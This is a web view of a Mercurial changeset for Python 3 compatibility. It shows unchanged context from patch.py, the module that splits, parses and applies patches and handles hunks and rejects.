##// END OF EJS Templates
py3: wrap file object to write patch in native eol preserving byte-ness
Yuya Nishihara -
r36855:472c68cd default
parent child Browse files
Show More
@@ -1,2905 +1,2905 b''
1 1 # patch.py - patch file parsing routines
2 2 #
3 3 # Copyright 2006 Brendan Cully <brendan@kublai.com>
4 4 # Copyright 2007 Chris Mason <chris.mason@oracle.com>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 from __future__ import absolute_import, print_function
10 10
11 11 import collections
12 12 import copy
13 13 import difflib
14 14 import email
15 15 import errno
16 16 import hashlib
17 17 import os
18 18 import posixpath
19 19 import re
20 20 import shutil
21 21 import tempfile
22 22 import zlib
23 23
24 24 from .i18n import _
25 25 from .node import (
26 26 hex,
27 27 short,
28 28 )
29 29 from . import (
30 30 copies,
31 31 encoding,
32 32 error,
33 33 mail,
34 34 mdiff,
35 35 pathutil,
36 36 policy,
37 37 pycompat,
38 38 scmutil,
39 39 similar,
40 40 util,
41 41 vfs as vfsmod,
42 42 )
43 43 from .utils import dateutil
44 44
45 45 diffhelpers = policy.importmod(r'diffhelpers')
46 46 stringio = util.stringio
47 47
48 48 gitre = re.compile(br'diff --git a/(.*) b/(.*)')
49 49 tabsplitter = re.compile(br'(\t+|[^\t]+)')
50 50 _nonwordre = re.compile(br'([^a-zA-Z0-9_\x80-\xff])')
51 51
52 52 PatchError = error.PatchError
53 53
54 54 # public functions
55 55
56 56 def split(stream):
57 57 '''return an iterator of individual patches from a stream'''
58 58 def isheader(line, inheader):
59 59 if inheader and line[0] in (' ', '\t'):
60 60 # continuation
61 61 return True
62 62 if line[0] in (' ', '-', '+'):
63 63 # diff line - don't check for header pattern in there
64 64 return False
65 65 l = line.split(': ', 1)
66 66 return len(l) == 2 and ' ' not in l[0]
67 67
68 68 def chunk(lines):
69 69 return stringio(''.join(lines))
70 70
71 71 def hgsplit(stream, cur):
72 72 inheader = True
73 73
74 74 for line in stream:
75 75 if not line.strip():
76 76 inheader = False
77 77 if not inheader and line.startswith('# HG changeset patch'):
78 78 yield chunk(cur)
79 79 cur = []
80 80 inheader = True
81 81
82 82 cur.append(line)
83 83
84 84 if cur:
85 85 yield chunk(cur)
86 86
87 87 def mboxsplit(stream, cur):
88 88 for line in stream:
89 89 if line.startswith('From '):
90 90 for c in split(chunk(cur[1:])):
91 91 yield c
92 92 cur = []
93 93
94 94 cur.append(line)
95 95
96 96 if cur:
97 97 for c in split(chunk(cur[1:])):
98 98 yield c
99 99
100 100 def mimesplit(stream, cur):
101 101 def msgfp(m):
102 102 fp = stringio()
103 103 g = email.Generator.Generator(fp, mangle_from_=False)
104 104 g.flatten(m)
105 105 fp.seek(0)
106 106 return fp
107 107
108 108 for line in stream:
109 109 cur.append(line)
110 110 c = chunk(cur)
111 111
112 112 m = pycompat.emailparser().parse(c)
113 113 if not m.is_multipart():
114 114 yield msgfp(m)
115 115 else:
116 116 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
117 117 for part in m.walk():
118 118 ct = part.get_content_type()
119 119 if ct not in ok_types:
120 120 continue
121 121 yield msgfp(part)
122 122
123 123 def headersplit(stream, cur):
124 124 inheader = False
125 125
126 126 for line in stream:
127 127 if not inheader and isheader(line, inheader):
128 128 yield chunk(cur)
129 129 cur = []
130 130 inheader = True
131 131 if inheader and not isheader(line, inheader):
132 132 inheader = False
133 133
134 134 cur.append(line)
135 135
136 136 if cur:
137 137 yield chunk(cur)
138 138
139 139 def remainder(cur):
140 140 yield chunk(cur)
141 141
142 142 class fiter(object):
143 143 def __init__(self, fp):
144 144 self.fp = fp
145 145
146 146 def __iter__(self):
147 147 return self
148 148
149 149 def next(self):
150 150 l = self.fp.readline()
151 151 if not l:
152 152 raise StopIteration
153 153 return l
154 154
155 155 __next__ = next
156 156
157 157 inheader = False
158 158 cur = []
159 159
160 160 mimeheaders = ['content-type']
161 161
162 162 if not util.safehasattr(stream, 'next'):
163 163 # http responses, for example, have readline but not next
164 164 stream = fiter(stream)
165 165
166 166 for line in stream:
167 167 cur.append(line)
168 168 if line.startswith('# HG changeset patch'):
169 169 return hgsplit(stream, cur)
170 170 elif line.startswith('From '):
171 171 return mboxsplit(stream, cur)
172 172 elif isheader(line, inheader):
173 173 inheader = True
174 174 if line.split(':', 1)[0].lower() in mimeheaders:
175 175 # let email parser handle this
176 176 return mimesplit(stream, cur)
177 177 elif line.startswith('--- ') and inheader:
178 178 # No evil headers seen by diff start, split by hand
179 179 return headersplit(stream, cur)
180 180 # Not enough info, keep reading
181 181
182 182 # if we are here, we have a very plain patch
183 183 return remainder(cur)
184 184
185 185 ## Some facility for extensible patch parsing:
186 186 # list of pairs ("header to match", "data key")
187 187 patchheadermap = [('Date', 'date'),
188 188 ('Branch', 'branch'),
189 189 ('Node ID', 'nodeid'),
190 190 ]
191 191
192 192 def extract(ui, fileobj):
193 193 '''extract patch from data read from fileobj.
194 194
195 195 patch can be a normal patch or contained in an email message.
196 196
197 197 return a dictionary. Standard keys are:
198 198 - filename,
199 199 - message,
200 200 - user,
201 201 - date,
202 202 - branch,
203 203 - node,
204 204 - p1,
205 205 - p2.
206 206 Any item can be missing from the dictionary. If filename is missing,
207 207 fileobj did not contain a patch. Caller must unlink filename when done.'''
208 208
209 209 # attempt to detect the start of a patch
210 210 # (this heuristic is borrowed from quilt)
211 211 diffre = re.compile(br'^(?:Index:[ \t]|diff[ \t]-|RCS file: |'
212 212 br'retrieving revision [0-9]+(\.[0-9]+)*$|'
213 213 br'---[ \t].*?^\+\+\+[ \t]|'
214 214 br'\*\*\*[ \t].*?^---[ \t])',
215 215 re.MULTILINE | re.DOTALL)
216 216
217 217 data = {}
218 218 fd, tmpname = tempfile.mkstemp(prefix='hg-patch-')
219 219 tmpfp = os.fdopen(fd, r'wb')
220 220 try:
221 221 msg = pycompat.emailparser().parse(fileobj)
222 222
223 223 subject = msg['Subject'] and mail.headdecode(msg['Subject'])
224 224 data['user'] = msg['From'] and mail.headdecode(msg['From'])
225 225 if not subject and not data['user']:
226 226 # Not an email, restore parsed headers if any
227 227 subject = '\n'.join(': '.join(h) for h in msg.items()) + '\n'
228 228
229 229 # should try to parse msg['Date']
230 230 parents = []
231 231
232 232 if subject:
233 233 if subject.startswith('[PATCH'):
234 234 pend = subject.find(']')
235 235 if pend >= 0:
236 236 subject = subject[pend + 1:].lstrip()
237 237 subject = re.sub(br'\n[ \t]+', ' ', subject)
238 238 ui.debug('Subject: %s\n' % subject)
239 239 if data['user']:
240 240 ui.debug('From: %s\n' % data['user'])
241 241 diffs_seen = 0
242 242 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
243 243 message = ''
244 244 for part in msg.walk():
245 245 content_type = pycompat.bytestr(part.get_content_type())
246 246 ui.debug('Content-Type: %s\n' % content_type)
247 247 if content_type not in ok_types:
248 248 continue
249 249 payload = part.get_payload(decode=True)
250 250 m = diffre.search(payload)
251 251 if m:
252 252 hgpatch = False
253 253 hgpatchheader = False
254 254 ignoretext = False
255 255
256 256 ui.debug('found patch at byte %d\n' % m.start(0))
257 257 diffs_seen += 1
258 258 cfp = stringio()
259 259 for line in payload[:m.start(0)].splitlines():
260 260 if line.startswith('# HG changeset patch') and not hgpatch:
261 261 ui.debug('patch generated by hg export\n')
262 262 hgpatch = True
263 263 hgpatchheader = True
264 264 # drop earlier commit message content
265 265 cfp.seek(0)
266 266 cfp.truncate()
267 267 subject = None
268 268 elif hgpatchheader:
269 269 if line.startswith('# User '):
270 270 data['user'] = line[7:]
271 271 ui.debug('From: %s\n' % data['user'])
272 272 elif line.startswith("# Parent "):
273 273 parents.append(line[9:].lstrip())
274 274 elif line.startswith("# "):
275 275 for header, key in patchheadermap:
276 276 prefix = '# %s ' % header
277 277 if line.startswith(prefix):
278 278 data[key] = line[len(prefix):]
279 279 else:
280 280 hgpatchheader = False
281 281 elif line == '---':
282 282 ignoretext = True
283 283 if not hgpatchheader and not ignoretext:
284 284 cfp.write(line)
285 285 cfp.write('\n')
286 286 message = cfp.getvalue()
287 287 if tmpfp:
288 288 tmpfp.write(payload)
289 289 if not payload.endswith('\n'):
290 290 tmpfp.write('\n')
291 291 elif not diffs_seen and message and content_type == 'text/plain':
292 292 message += '\n' + payload
293 293 except: # re-raises
294 294 tmpfp.close()
295 295 os.unlink(tmpname)
296 296 raise
297 297
298 298 if subject and not message.startswith(subject):
299 299 message = '%s\n%s' % (subject, message)
300 300 data['message'] = message
301 301 tmpfp.close()
302 302 if parents:
303 303 data['p1'] = parents.pop(0)
304 304 if parents:
305 305 data['p2'] = parents.pop(0)
306 306
307 307 if diffs_seen:
308 308 data['filename'] = tmpname
309 309 else:
310 310 os.unlink(tmpname)
311 311 return data
312 312
313 313 class patchmeta(object):
314 314 """Patched file metadata
315 315
316 316 'op' is the performed operation within ADD, DELETE, RENAME, MODIFY
317 317 or COPY. 'path' is patched file path. 'oldpath' is set to the
318 318 origin file when 'op' is either COPY or RENAME, None otherwise. If
319 319 file mode is changed, 'mode' is a tuple (islink, isexec) where
320 320 'islink' is True if the file is a symlink and 'isexec' is True if
321 321 the file is executable. Otherwise, 'mode' is None.
322 322 """
323 323 def __init__(self, path):
324 324 self.path = path
325 325 self.oldpath = None
326 326 self.mode = None
327 327 self.op = 'MODIFY'
328 328 self.binary = False
329 329
330 330 def setmode(self, mode):
331 331 islink = mode & 0o20000
332 332 isexec = mode & 0o100
333 333 self.mode = (islink, isexec)
334 334
335 335 def copy(self):
336 336 other = patchmeta(self.path)
337 337 other.oldpath = self.oldpath
338 338 other.mode = self.mode
339 339 other.op = self.op
340 340 other.binary = self.binary
341 341 return other
342 342
343 343 def _ispatchinga(self, afile):
344 344 if afile == '/dev/null':
345 345 return self.op == 'ADD'
346 346 return afile == 'a/' + (self.oldpath or self.path)
347 347
348 348 def _ispatchingb(self, bfile):
349 349 if bfile == '/dev/null':
350 350 return self.op == 'DELETE'
351 351 return bfile == 'b/' + self.path
352 352
353 353 def ispatching(self, afile, bfile):
354 354 return self._ispatchinga(afile) and self._ispatchingb(bfile)
355 355
356 356 def __repr__(self):
357 357 return "<patchmeta %s %r>" % (self.op, self.path)
358 358
359 359 def readgitpatch(lr):
360 360 """extract git-style metadata about patches from <patchname>"""
361 361
362 362 # Filter patch for git information
363 363 gp = None
364 364 gitpatches = []
365 365 for line in lr:
366 366 line = line.rstrip(' \r\n')
367 367 if line.startswith('diff --git a/'):
368 368 m = gitre.match(line)
369 369 if m:
370 370 if gp:
371 371 gitpatches.append(gp)
372 372 dst = m.group(2)
373 373 gp = patchmeta(dst)
374 374 elif gp:
375 375 if line.startswith('--- '):
376 376 gitpatches.append(gp)
377 377 gp = None
378 378 continue
379 379 if line.startswith('rename from '):
380 380 gp.op = 'RENAME'
381 381 gp.oldpath = line[12:]
382 382 elif line.startswith('rename to '):
383 383 gp.path = line[10:]
384 384 elif line.startswith('copy from '):
385 385 gp.op = 'COPY'
386 386 gp.oldpath = line[10:]
387 387 elif line.startswith('copy to '):
388 388 gp.path = line[8:]
389 389 elif line.startswith('deleted file'):
390 390 gp.op = 'DELETE'
391 391 elif line.startswith('new file mode '):
392 392 gp.op = 'ADD'
393 393 gp.setmode(int(line[-6:], 8))
394 394 elif line.startswith('new mode '):
395 395 gp.setmode(int(line[-6:], 8))
396 396 elif line.startswith('GIT binary patch'):
397 397 gp.binary = True
398 398 if gp:
399 399 gitpatches.append(gp)
400 400
401 401 return gitpatches
402 402
403 403 class linereader(object):
404 404 # simple class to allow pushing lines back into the input stream
405 405 def __init__(self, fp):
406 406 self.fp = fp
407 407 self.buf = []
408 408
409 409 def push(self, line):
410 410 if line is not None:
411 411 self.buf.append(line)
412 412
413 413 def readline(self):
414 414 if self.buf:
415 415 l = self.buf[0]
416 416 del self.buf[0]
417 417 return l
418 418 return self.fp.readline()
419 419
420 420 def __iter__(self):
421 421 return iter(self.readline, '')
422 422
423 423 class abstractbackend(object):
424 424 def __init__(self, ui):
425 425 self.ui = ui
426 426
427 427 def getfile(self, fname):
428 428 """Return target file data and flags as a (data, (islink,
429 429 isexec)) tuple. Data is None if file is missing/deleted.
430 430 """
431 431 raise NotImplementedError
432 432
433 433 def setfile(self, fname, data, mode, copysource):
434 434 """Write data to target file fname and set its mode. mode is a
435 435 (islink, isexec) tuple. If data is None, the file content should
436 436 be left unchanged. If the file is modified after being copied,
437 437 copysource is set to the original file name.
438 438 """
439 439 raise NotImplementedError
440 440
441 441 def unlink(self, fname):
442 442 """Unlink target file."""
443 443 raise NotImplementedError
444 444
445 445 def writerej(self, fname, failed, total, lines):
446 446 """Write rejected lines for fname. total is the number of hunks
447 447 which failed to apply and total the total number of hunks for this
448 448 files.
449 449 """
450 450
451 451 def exists(self, fname):
452 452 raise NotImplementedError
453 453
454 454 def close(self):
455 455 raise NotImplementedError
456 456
457 457 class fsbackend(abstractbackend):
458 458 def __init__(self, ui, basedir):
459 459 super(fsbackend, self).__init__(ui)
460 460 self.opener = vfsmod.vfs(basedir)
461 461
462 462 def getfile(self, fname):
463 463 if self.opener.islink(fname):
464 464 return (self.opener.readlink(fname), (True, False))
465 465
466 466 isexec = False
467 467 try:
468 468 isexec = self.opener.lstat(fname).st_mode & 0o100 != 0
469 469 except OSError as e:
470 470 if e.errno != errno.ENOENT:
471 471 raise
472 472 try:
473 473 return (self.opener.read(fname), (False, isexec))
474 474 except IOError as e:
475 475 if e.errno != errno.ENOENT:
476 476 raise
477 477 return None, None
478 478
479 479 def setfile(self, fname, data, mode, copysource):
480 480 islink, isexec = mode
481 481 if data is None:
482 482 self.opener.setflags(fname, islink, isexec)
483 483 return
484 484 if islink:
485 485 self.opener.symlink(data, fname)
486 486 else:
487 487 self.opener.write(fname, data)
488 488 if isexec:
489 489 self.opener.setflags(fname, False, True)
490 490
491 491 def unlink(self, fname):
492 492 self.opener.unlinkpath(fname, ignoremissing=True)
493 493
494 494 def writerej(self, fname, failed, total, lines):
495 495 fname = fname + ".rej"
496 496 self.ui.warn(
497 497 _("%d out of %d hunks FAILED -- saving rejects to file %s\n") %
498 498 (failed, total, fname))
499 499 fp = self.opener(fname, 'w')
500 500 fp.writelines(lines)
501 501 fp.close()
502 502
503 503 def exists(self, fname):
504 504 return self.opener.lexists(fname)
505 505
506 506 class workingbackend(fsbackend):
507 507 def __init__(self, ui, repo, similarity):
508 508 super(workingbackend, self).__init__(ui, repo.root)
509 509 self.repo = repo
510 510 self.similarity = similarity
511 511 self.removed = set()
512 512 self.changed = set()
513 513 self.copied = []
514 514
515 515 def _checkknown(self, fname):
516 516 if self.repo.dirstate[fname] == '?' and self.exists(fname):
517 517 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
518 518
519 519 def setfile(self, fname, data, mode, copysource):
520 520 self._checkknown(fname)
521 521 super(workingbackend, self).setfile(fname, data, mode, copysource)
522 522 if copysource is not None:
523 523 self.copied.append((copysource, fname))
524 524 self.changed.add(fname)
525 525
526 526 def unlink(self, fname):
527 527 self._checkknown(fname)
528 528 super(workingbackend, self).unlink(fname)
529 529 self.removed.add(fname)
530 530 self.changed.add(fname)
531 531
532 532 def close(self):
533 533 wctx = self.repo[None]
534 534 changed = set(self.changed)
535 535 for src, dst in self.copied:
536 536 scmutil.dirstatecopy(self.ui, self.repo, wctx, src, dst)
537 537 if self.removed:
538 538 wctx.forget(sorted(self.removed))
539 539 for f in self.removed:
540 540 if f not in self.repo.dirstate:
541 541 # File was deleted and no longer belongs to the
542 542 # dirstate, it was probably marked added then
543 543 # deleted, and should not be considered by
544 544 # marktouched().
545 545 changed.discard(f)
546 546 if changed:
547 547 scmutil.marktouched(self.repo, changed, self.similarity)
548 548 return sorted(self.changed)
549 549
550 550 class filestore(object):
551 551 def __init__(self, maxsize=None):
552 552 self.opener = None
553 553 self.files = {}
554 554 self.created = 0
555 555 self.maxsize = maxsize
556 556 if self.maxsize is None:
557 557 self.maxsize = 4*(2**20)
558 558 self.size = 0
559 559 self.data = {}
560 560
561 561 def setfile(self, fname, data, mode, copied=None):
562 562 if self.maxsize < 0 or (len(data) + self.size) <= self.maxsize:
563 563 self.data[fname] = (data, mode, copied)
564 564 self.size += len(data)
565 565 else:
566 566 if self.opener is None:
567 567 root = tempfile.mkdtemp(prefix='hg-patch-')
568 568 self.opener = vfsmod.vfs(root)
569 569 # Avoid filename issues with these simple names
570 570 fn = '%d' % self.created
571 571 self.opener.write(fn, data)
572 572 self.created += 1
573 573 self.files[fname] = (fn, mode, copied)
574 574
575 575 def getfile(self, fname):
576 576 if fname in self.data:
577 577 return self.data[fname]
578 578 if not self.opener or fname not in self.files:
579 579 return None, None, None
580 580 fn, mode, copied = self.files[fname]
581 581 return self.opener.read(fn), mode, copied
582 582
583 583 def close(self):
584 584 if self.opener:
585 585 shutil.rmtree(self.opener.base)
586 586
587 587 class repobackend(abstractbackend):
588 588 def __init__(self, ui, repo, ctx, store):
589 589 super(repobackend, self).__init__(ui)
590 590 self.repo = repo
591 591 self.ctx = ctx
592 592 self.store = store
593 593 self.changed = set()
594 594 self.removed = set()
595 595 self.copied = {}
596 596
597 597 def _checkknown(self, fname):
598 598 if fname not in self.ctx:
599 599 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
600 600
601 601 def getfile(self, fname):
602 602 try:
603 603 fctx = self.ctx[fname]
604 604 except error.LookupError:
605 605 return None, None
606 606 flags = fctx.flags()
607 607 return fctx.data(), ('l' in flags, 'x' in flags)
608 608
609 609 def setfile(self, fname, data, mode, copysource):
610 610 if copysource:
611 611 self._checkknown(copysource)
612 612 if data is None:
613 613 data = self.ctx[fname].data()
614 614 self.store.setfile(fname, data, mode, copysource)
615 615 self.changed.add(fname)
616 616 if copysource:
617 617 self.copied[fname] = copysource
618 618
619 619 def unlink(self, fname):
620 620 self._checkknown(fname)
621 621 self.removed.add(fname)
622 622
623 623 def exists(self, fname):
624 624 return fname in self.ctx
625 625
626 626 def close(self):
627 627 return self.changed | self.removed
628 628
629 629 # @@ -start,len +start,len @@ or @@ -start +start @@ if len is 1
630 630 unidesc = re.compile('@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@')
631 631 contextdesc = re.compile('(?:---|\*\*\*) (\d+)(?:,(\d+))? (?:---|\*\*\*)')
632 632 eolmodes = ['strict', 'crlf', 'lf', 'auto']
633 633
634 634 class patchfile(object):
635 635 def __init__(self, ui, gp, backend, store, eolmode='strict'):
636 636 self.fname = gp.path
637 637 self.eolmode = eolmode
638 638 self.eol = None
639 639 self.backend = backend
640 640 self.ui = ui
641 641 self.lines = []
642 642 self.exists = False
643 643 self.missing = True
644 644 self.mode = gp.mode
645 645 self.copysource = gp.oldpath
646 646 self.create = gp.op in ('ADD', 'COPY', 'RENAME')
647 647 self.remove = gp.op == 'DELETE'
648 648 if self.copysource is None:
649 649 data, mode = backend.getfile(self.fname)
650 650 else:
651 651 data, mode = store.getfile(self.copysource)[:2]
652 652 if data is not None:
653 653 self.exists = self.copysource is None or backend.exists(self.fname)
654 654 self.missing = False
655 655 if data:
656 656 self.lines = mdiff.splitnewlines(data)
657 657 if self.mode is None:
658 658 self.mode = mode
659 659 if self.lines:
660 660 # Normalize line endings
661 661 if self.lines[0].endswith('\r\n'):
662 662 self.eol = '\r\n'
663 663 elif self.lines[0].endswith('\n'):
664 664 self.eol = '\n'
665 665 if eolmode != 'strict':
666 666 nlines = []
667 667 for l in self.lines:
668 668 if l.endswith('\r\n'):
669 669 l = l[:-2] + '\n'
670 670 nlines.append(l)
671 671 self.lines = nlines
672 672 else:
673 673 if self.create:
674 674 self.missing = False
675 675 if self.mode is None:
676 676 self.mode = (False, False)
677 677 if self.missing:
678 678 self.ui.warn(_("unable to find '%s' for patching\n") % self.fname)
679 679 self.ui.warn(_("(use '--prefix' to apply patch relative to the "
680 680 "current directory)\n"))
681 681
682 682 self.hash = {}
683 683 self.dirty = 0
684 684 self.offset = 0
685 685 self.skew = 0
686 686 self.rej = []
687 687 self.fileprinted = False
688 688 self.printfile(False)
689 689 self.hunks = 0
690 690
691 691 def writelines(self, fname, lines, mode):
692 692 if self.eolmode == 'auto':
693 693 eol = self.eol
694 694 elif self.eolmode == 'crlf':
695 695 eol = '\r\n'
696 696 else:
697 697 eol = '\n'
698 698
699 699 if self.eolmode != 'strict' and eol and eol != '\n':
700 700 rawlines = []
701 701 for l in lines:
702 702 if l and l[-1] == '\n':
703 703 l = l[:-1] + eol
704 704 rawlines.append(l)
705 705 lines = rawlines
706 706
707 707 self.backend.setfile(fname, ''.join(lines), mode, self.copysource)
708 708
709 709 def printfile(self, warn):
710 710 if self.fileprinted:
711 711 return
712 712 if warn or self.ui.verbose:
713 713 self.fileprinted = True
714 714 s = _("patching file %s\n") % self.fname
715 715 if warn:
716 716 self.ui.warn(s)
717 717 else:
718 718 self.ui.note(s)
719 719
720 720
721 721 def findlines(self, l, linenum):
722 722 # looks through the hash and finds candidate lines. The
723 723 # result is a list of line numbers sorted based on distance
724 724 # from linenum
725 725
726 726 cand = self.hash.get(l, [])
727 727 if len(cand) > 1:
728 728 # resort our list of potentials forward then back.
729 729 cand.sort(key=lambda x: abs(x - linenum))
730 730 return cand
731 731
732 732 def write_rej(self):
733 733 # our rejects are a little different from patch(1). This always
734 734 # creates rejects in the same form as the original patch. A file
735 735 # header is inserted so that you can run the reject through patch again
736 736 # without having to type the filename.
737 737 if not self.rej:
738 738 return
739 739 base = os.path.basename(self.fname)
740 740 lines = ["--- %s\n+++ %s\n" % (base, base)]
741 741 for x in self.rej:
742 742 for l in x.hunk:
743 743 lines.append(l)
744 744 if l[-1:] != '\n':
745 745 lines.append("\n\ No newline at end of file\n")
746 746 self.backend.writerej(self.fname, len(self.rej), self.hunks, lines)
747 747
748 748 def apply(self, h):
749 749 if not h.complete():
750 750 raise PatchError(_("bad hunk #%d %s (%d %d %d %d)") %
751 751 (h.number, h.desc, len(h.a), h.lena, len(h.b),
752 752 h.lenb))
753 753
754 754 self.hunks += 1
755 755
756 756 if self.missing:
757 757 self.rej.append(h)
758 758 return -1
759 759
760 760 if self.exists and self.create:
761 761 if self.copysource:
762 762 self.ui.warn(_("cannot create %s: destination already "
763 763 "exists\n") % self.fname)
764 764 else:
765 765 self.ui.warn(_("file %s already exists\n") % self.fname)
766 766 self.rej.append(h)
767 767 return -1
768 768
769 769 if isinstance(h, binhunk):
770 770 if self.remove:
771 771 self.backend.unlink(self.fname)
772 772 else:
773 773 l = h.new(self.lines)
774 774 self.lines[:] = l
775 775 self.offset += len(l)
776 776 self.dirty = True
777 777 return 0
778 778
779 779 horig = h
780 780 if (self.eolmode in ('crlf', 'lf')
781 781 or self.eolmode == 'auto' and self.eol):
782 782 # If new eols are going to be normalized, then normalize
783 783 # hunk data before patching. Otherwise, preserve input
784 784 # line-endings.
785 785 h = h.getnormalized()
786 786
787 787 # fast case first, no offsets, no fuzz
788 788 old, oldstart, new, newstart = h.fuzzit(0, False)
789 789 oldstart += self.offset
790 790 orig_start = oldstart
791 791 # if there's skew we want to emit the "(offset %d lines)" even
792 792 # when the hunk cleanly applies at start + skew, so skip the
793 793 # fast case code
794 794 if (self.skew == 0 and
795 795 diffhelpers.testhunk(old, self.lines, oldstart) == 0):
796 796 if self.remove:
797 797 self.backend.unlink(self.fname)
798 798 else:
799 799 self.lines[oldstart:oldstart + len(old)] = new
800 800 self.offset += len(new) - len(old)
801 801 self.dirty = True
802 802 return 0
803 803
804 804 # ok, we couldn't match the hunk. Lets look for offsets and fuzz it
805 805 self.hash = {}
806 806 for x, s in enumerate(self.lines):
807 807 self.hash.setdefault(s, []).append(x)
808 808
809 809 for fuzzlen in xrange(self.ui.configint("patch", "fuzz") + 1):
810 810 for toponly in [True, False]:
811 811 old, oldstart, new, newstart = h.fuzzit(fuzzlen, toponly)
812 812 oldstart = oldstart + self.offset + self.skew
813 813 oldstart = min(oldstart, len(self.lines))
814 814 if old:
815 815 cand = self.findlines(old[0][1:], oldstart)
816 816 else:
817 817 # Only adding lines with no or fuzzed context, just
818 818 # take the skew in account
819 819 cand = [oldstart]
820 820
821 821 for l in cand:
822 822 if not old or diffhelpers.testhunk(old, self.lines, l) == 0:
823 823 self.lines[l : l + len(old)] = new
824 824 self.offset += len(new) - len(old)
825 825 self.skew = l - orig_start
826 826 self.dirty = True
827 827 offset = l - orig_start - fuzzlen
828 828 if fuzzlen:
829 829 msg = _("Hunk #%d succeeded at %d "
830 830 "with fuzz %d "
831 831 "(offset %d lines).\n")
832 832 self.printfile(True)
833 833 self.ui.warn(msg %
834 834 (h.number, l + 1, fuzzlen, offset))
835 835 else:
836 836 msg = _("Hunk #%d succeeded at %d "
837 837 "(offset %d lines).\n")
838 838 self.ui.note(msg % (h.number, l + 1, offset))
839 839 return fuzzlen
840 840 self.printfile(True)
841 841 self.ui.warn(_("Hunk #%d FAILED at %d\n") % (h.number, orig_start))
842 842 self.rej.append(horig)
843 843 return -1
844 844
845 845 def close(self):
846 846 if self.dirty:
847 847 self.writelines(self.fname, self.lines, self.mode)
848 848 self.write_rej()
849 849 return len(self.rej)
850 850
851 851 class header(object):
852 852 """patch header
853 853 """
854 854 diffgit_re = re.compile('diff --git a/(.*) b/(.*)$')
855 855 diff_re = re.compile('diff -r .* (.*)$')
856 856 allhunks_re = re.compile('(?:index|deleted file) ')
857 857 pretty_re = re.compile('(?:new file|deleted file) ')
858 858 special_re = re.compile('(?:index|deleted|copy|rename) ')
859 859 newfile_re = re.compile('(?:new file)')
860 860
861 861 def __init__(self, header):
862 862 self.header = header
863 863 self.hunks = []
864 864
865 865 def binary(self):
866 866 return any(h.startswith('index ') for h in self.header)
867 867
868 868 def pretty(self, fp):
869 869 for h in self.header:
870 870 if h.startswith('index '):
871 871 fp.write(_('this modifies a binary file (all or nothing)\n'))
872 872 break
873 873 if self.pretty_re.match(h):
874 874 fp.write(h)
875 875 if self.binary():
876 876 fp.write(_('this is a binary file\n'))
877 877 break
878 878 if h.startswith('---'):
879 879 fp.write(_('%d hunks, %d lines changed\n') %
880 880 (len(self.hunks),
881 881 sum([max(h.added, h.removed) for h in self.hunks])))
882 882 break
883 883 fp.write(h)
884 884
885 885 def write(self, fp):
886 886 fp.write(''.join(self.header))
887 887
888 888 def allhunks(self):
889 889 return any(self.allhunks_re.match(h) for h in self.header)
890 890
891 891 def files(self):
892 892 match = self.diffgit_re.match(self.header[0])
893 893 if match:
894 894 fromfile, tofile = match.groups()
895 895 if fromfile == tofile:
896 896 return [fromfile]
897 897 return [fromfile, tofile]
898 898 else:
899 899 return self.diff_re.match(self.header[0]).groups()
900 900
901 901 def filename(self):
902 902 return self.files()[-1]
903 903
904 904 def __repr__(self):
905 905 return '<header %s>' % (' '.join(map(repr, self.files())))
906 906
907 907 def isnewfile(self):
908 908 return any(self.newfile_re.match(h) for h in self.header)
909 909
910 910 def special(self):
911 911 # Special files are shown only at the header level and not at the hunk
912 912 # level for example a file that has been deleted is a special file.
913 913 # The user cannot change the content of the operation, in the case of
914 914 # the deleted file he has to take the deletion or not take it, he
915 915 # cannot take some of it.
916 916 # Newly added files are special if they are empty, they are not special
917 917 # if they have some content as we want to be able to change it
918 918 nocontent = len(self.header) == 2
919 919 emptynewfile = self.isnewfile() and nocontent
920 920 return emptynewfile or \
921 921 any(self.special_re.match(h) for h in self.header)
922 922
923 923 class recordhunk(object):
924 924 """patch hunk
925 925
926 926 XXX shouldn't we merge this with the other hunk class?
927 927 """
928 928
929 929 def __init__(self, header, fromline, toline, proc, before, hunk, after,
930 930 maxcontext=None):
931 931 def trimcontext(lines, reverse=False):
932 932 if maxcontext is not None:
933 933 delta = len(lines) - maxcontext
934 934 if delta > 0:
935 935 if reverse:
936 936 return delta, lines[delta:]
937 937 else:
938 938 return delta, lines[:maxcontext]
939 939 return 0, lines
940 940
941 941 self.header = header
942 942 trimedbefore, self.before = trimcontext(before, True)
943 943 self.fromline = fromline + trimedbefore
944 944 self.toline = toline + trimedbefore
945 945 _trimedafter, self.after = trimcontext(after, False)
946 946 self.proc = proc
947 947 self.hunk = hunk
948 948 self.added, self.removed = self.countchanges(self.hunk)
949 949
950 950 def __eq__(self, v):
951 951 if not isinstance(v, recordhunk):
952 952 return False
953 953
954 954 return ((v.hunk == self.hunk) and
955 955 (v.proc == self.proc) and
956 956 (self.fromline == v.fromline) and
957 957 (self.header.files() == v.header.files()))
958 958
959 959 def __hash__(self):
960 960 return hash((tuple(self.hunk),
961 961 tuple(self.header.files()),
962 962 self.fromline,
963 963 self.proc))
964 964
965 965 def countchanges(self, hunk):
966 966 """hunk -> (n+,n-)"""
967 967 add = len([h for h in hunk if h.startswith('+')])
968 968 rem = len([h for h in hunk if h.startswith('-')])
969 969 return add, rem
970 970
971 971 def reversehunk(self):
972 972 """return another recordhunk which is the reverse of the hunk
973 973
974 974 If this hunk is diff(A, B), the returned hunk is diff(B, A). To do
975 975 that, swap fromline/toline and +/- signs while keep other things
976 976 unchanged.
977 977 """
978 978 m = {'+': '-', '-': '+', '\\': '\\'}
979 979 hunk = ['%s%s' % (m[l[0:1]], l[1:]) for l in self.hunk]
980 980 return recordhunk(self.header, self.toline, self.fromline, self.proc,
981 981 self.before, hunk, self.after)
982 982
983 983 def write(self, fp):
984 984 delta = len(self.before) + len(self.after)
985 985 if self.after and self.after[-1] == '\\ No newline at end of file\n':
986 986 delta -= 1
987 987 fromlen = delta + self.removed
988 988 tolen = delta + self.added
989 989 fp.write('@@ -%d,%d +%d,%d @@%s\n' %
990 990 (self.fromline, fromlen, self.toline, tolen,
991 991 self.proc and (' ' + self.proc)))
992 992 fp.write(''.join(self.before + self.hunk + self.after))
993 993
994 994 pretty = write
995 995
996 996 def filename(self):
997 997 return self.header.filename()
998 998
999 999 def __repr__(self):
